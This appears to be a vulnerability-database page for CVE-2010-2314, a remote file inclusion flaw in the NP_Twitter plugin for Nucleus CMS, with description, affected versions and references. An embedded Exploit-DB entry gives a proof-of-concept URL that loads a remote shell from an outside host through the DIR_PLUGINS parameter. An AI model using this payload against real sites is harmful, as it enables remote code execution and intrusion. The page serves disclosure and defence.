CVE-2010-2314
Description
PHP remote file inclusion vulnerability in nucleus/plugins/NP_Twitter.php in the NP_Twitter Plugin 0.8 and 0.9 for Nucleus, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the DIR_PLUGINS parameter. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Nucleus Plugin Twitter - Remote File Inclusion
=============================================================================================================
[o] Nucleus Plugin Twitter Remote File Inclusion Vulnerability
Software : NP_Twitter version 0.8
Download : http://edmondhui.homeip.net/nudn?file=2/NP_Twitter_v0_8.zip
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
=============================================================================================================
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=[evilc0de]
[o] PoC
http://localhost/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=http://host.com/shell?
=============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 inc0mp13te
ArRay bjork xmazinha veter f1 & all people in #evilc0de [at] irc.byroe.net
=============================================================================================================
[o] May 29 2010 - GMT +07:00 Jakarta, Indonesia
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| edmondhui.homeip | np_twitter | 0.8 | |
| edmondhui.homeip | np_twitter | 0.9 | |
| nucleus_group | nucleus_cms | | |
References
- http://packetstormsecurity.org/1005-exploits/nucleustwitter-rfi.txt
- http://secunia.com/advisories/39997
- http://www.exploit-db.com/exploits/12790/
- http://www.osvdb.org/65007
- http://www.securityfocus.com/bid/40453
- http://www.vupen.com/english/advisories/2010/1284
- http://packetstormsecurity.org/1005-exploits/nucleustwitter-rfi.txt
- http://secunia.com/advisories/39997
- http://www.exploit-db.com/exploits/12790/
- http://www.osvdb.org/65007
- http://www.securityfocus.com/bid/40453
- http://www.vupen.com/english/advisories/2010/1284
CWEs
CWE-94
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.